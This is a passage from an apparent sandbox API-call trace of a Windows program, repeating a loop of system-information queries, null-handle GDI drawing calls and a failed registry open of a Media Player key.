(ho=0x210401d0) returned 1 [0087.602] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.602] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.602] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.602] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.602] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.602] BeginPath (hdc=0x0) returned 0 [0087.602] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.602] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.602] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.602] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.602] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.602] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.602] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.602] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.602] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x240401cd [0087.602] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x220401d0 [0087.602] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040849 [0087.602] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104084a [0087.602] CombineRgn (hrgnDst=0x1040849, hrgnSrc1=0x240401cd, hrgnSrc2=0x220401d0, iMode=1) returned 1 [0087.602] CombineRgn (hrgnDst=0x104084a, hrgnSrc1=0x240401cd, hrgnSrc2=0x220401d0, iMode=4) returned 2 [0087.602] CreateSolidBrush (color=0xff) returned 0x2100848 [0087.602] CreateSolidBrush (color=0xff0000) returned 0x110084b [0087.602] DeleteObject (ho=0x110084b) returned 1 [0087.602] DeleteObject (ho=0x220401d0) returned 1 [0087.602] DeleteObject (ho=0x240401cd) returned 1 [0087.602] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.602] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.602] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.602] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.602] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.602] BeginPath (hdc=0x0) returned 0 [0087.602] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.602] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.602] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.602] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.602] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.602] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.603] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.603] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401d0 [0087.603] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401cd [0087.603] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104084c [0087.603] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104084d [0087.603] CombineRgn (hrgnDst=0x104084c, hrgnSrc1=0x230401d0, hrgnSrc2=0x250401cd, iMode=1) returned 1 [0087.603] CombineRgn (hrgnDst=0x104084d, hrgnSrc1=0x230401d0, hrgnSrc2=0x250401cd, iMode=4) returned 2 [0087.603] CreateSolidBrush (color=0xff) returned 0x210084b [0087.603] CreateSolidBrush (color=0xff0000) returned 0x110084e [0087.603] DeleteObject (ho=0x110084e) returned 1 [0087.603] DeleteObject (ho=0x250401cd) returned 1 [0087.603] DeleteObject (ho=0x230401d0) returned 1 [0087.603] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.603] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.603] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.603] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.603] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.603] BeginPath (hdc=0x0) returned 0 [0087.603] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.603] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.603] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.603] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.603] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.603] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.603] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.603] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401cd [0087.603] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401d0 [0087.603] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104084f [0087.603] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040850 [0087.603] CombineRgn (hrgnDst=0x104084f, hrgnSrc1=0x260401cd, hrgnSrc2=0x240401d0, iMode=1) returned 1 [0087.603] CombineRgn (hrgnDst=0x1040850, hrgnSrc1=0x260401cd, hrgnSrc2=0x240401d0, iMode=4) returned 2 [0087.603] CreateSolidBrush (color=0xff) returned 0x210084e [0087.604] CreateSolidBrush (color=0xff0000) returned 0x1100851 [0087.604] DeleteObject (ho=0x1100851) returned 1 [0087.604] DeleteObject (ho=0x240401d0) returned 1 [0087.604] DeleteObject (ho=0x260401cd) returned 1 [0087.604] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.604] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.604] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.604] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.604] BeginPath (hdc=0x0) returned 0 [0087.604] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.604] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.604] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.604] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.604] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.604] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401d0 [0087.604] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401cd [0087.604] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040852 [0087.604] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040853 [0087.604] CombineRgn (hrgnDst=0x1040852, hrgnSrc1=0x250401d0, hrgnSrc2=0x270401cd, iMode=1) returned 1 [0087.604] CombineRgn (hrgnDst=0x1040853, hrgnSrc1=0x250401d0, hrgnSrc2=0x270401cd, iMode=4) returned 2 [0087.604] CreateSolidBrush (color=0xff) returned 0x2100851 [0087.604] CreateSolidBrush (color=0xff0000) returned 0x1100854 [0087.604] DeleteObject (ho=0x1100854) returned 1 [0087.604] DeleteObject (ho=0x270401cd) returned 1 [0087.604] DeleteObject (ho=0x250401d0) returned 1 [0087.604] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.604] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.604] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.604] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.604] BeginPath (hdc=0x0) returned 0 [0087.604] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.604] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.604] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.604] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.604] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.605] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.605] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401cd [0087.605] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401d0 [0087.605] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040855 [0087.605] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040856 [0087.605] CombineRgn (hrgnDst=0x1040855, hrgnSrc1=0x280401cd, hrgnSrc2=0x260401d0, iMode=1) returned 1 [0087.605] CombineRgn (hrgnDst=0x1040856, hrgnSrc1=0x280401cd, hrgnSrc2=0x260401d0, iMode=4) returned 2 [0087.605] CreateSolidBrush (color=0xff) returned 0x2100854 [0087.605] CreateSolidBrush (color=0xff0000) returned 0x1100857 [0087.605] DeleteObject (ho=0x1100857) returned 1 [0087.605] DeleteObject (ho=0x260401d0) returned 1 [0087.605] DeleteObject (ho=0x280401cd) returned 1 [0087.605] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.605] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.605] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.605] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.605] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.605] BeginPath (hdc=0x0) returned 0 [0087.605] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.605] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.605] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.605] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.605] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.605] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.605] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.605] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401d0 [0087.605] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401cd [0087.605] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040858 [0087.605] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040859 [0087.605] CombineRgn (hrgnDst=0x1040858, hrgnSrc1=0x270401d0, hrgnSrc2=0x290401cd, iMode=1) returned 1 [0087.605] CombineRgn (hrgnDst=0x1040859, hrgnSrc1=0x270401d0, hrgnSrc2=0x290401cd, iMode=4) returned 2 [0087.605] CreateSolidBrush (color=0xff) returned 0x2100857 [0087.605] CreateSolidBrush (color=0xff0000) returned 0x110085a [0087.605] DeleteObject (ho=0x110085a) returned 1 [0087.605] DeleteObject (ho=0x290401cd) returned 1 [0087.605] DeleteObject (ho=0x270401d0) returned 1 [0087.606] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.606] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.606] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.606] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.606] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.606] BeginPath (hdc=0x0) returned 0 [0087.606] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.606] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.606] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.606] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.606] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.606] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.606] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.606] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.606] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401cd [0087.606] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401d0 [0087.606] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104085b [0087.606] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104085c [0087.606] CombineRgn (hrgnDst=0x104085b, hrgnSrc1=0x2a0401cd, hrgnSrc2=0x280401d0, iMode=1) returned 1 [0087.606] CombineRgn (hrgnDst=0x104085c, hrgnSrc1=0x2a0401cd, hrgnSrc2=0x280401d0, iMode=4) returned 2 [0087.606] CreateSolidBrush (color=0xff) returned 0x210085a [0087.606] CreateSolidBrush (color=0xff0000) returned 0x110085d [0087.606] DeleteObject (ho=0x110085d) returned 1 [0087.606] DeleteObject (ho=0x280401d0) returned 1 [0087.606] DeleteObject (ho=0x2a0401cd) returned 1 [0087.606] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.606] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.606] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.606] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.606] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.606] BeginPath (hdc=0x0) returned 0 [0087.606] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.606] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.606] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.606] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.606] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.606] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.607] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.607] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.607] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401d0 [0087.607] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401cd [0087.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104085e [0087.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104085f [0087.607] CombineRgn (hrgnDst=0x104085e, hrgnSrc1=0x290401d0, hrgnSrc2=0x2b0401cd, iMode=1) returned 1 [0087.607] CombineRgn (hrgnDst=0x104085f, hrgnSrc1=0x290401d0, hrgnSrc2=0x2b0401cd, iMode=4) returned 2 [0087.607] CreateSolidBrush (color=0xff) returned 0x210085d [0087.607] CreateSolidBrush (color=0xff0000) returned 0x1100860 [0087.607] DeleteObject (ho=0x1100860) returned 1 [0087.607] DeleteObject (ho=0x2b0401cd) returned 1 [0087.607] DeleteObject (ho=0x290401d0) returned 1 [0087.607] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.607] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.607] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.607] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.607] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.607] BeginPath (hdc=0x0) returned 0 [0087.607] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.607] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.607] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.607] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.607] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.607] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.607] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.607] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.607] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c0401cd [0087.607] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a0401d0 [0087.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040861 [0087.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040862 [0087.607] CombineRgn (hrgnDst=0x1040861, hrgnSrc1=0x2c0401cd, hrgnSrc2=0x2a0401d0, iMode=1) returned 1 [0087.607] CombineRgn (hrgnDst=0x1040862, hrgnSrc1=0x2c0401cd, hrgnSrc2=0x2a0401d0, iMode=4) returned 2 [0087.607] CreateSolidBrush (color=0xff) returned 0x2100860 [0087.607] CreateSolidBrush (color=0xff0000) returned 0x1100863 [0087.607] DeleteObject (ho=0x1100863) returned 1 [0087.607] DeleteObject (ho=0x2a0401d0) returned 1 [0087.607] DeleteObject (ho=0x2c0401cd) returned 1 [0087.608] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.608] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.608] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.608] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.608] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.608] BeginPath (hdc=0x0) returned 0 [0087.608] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: 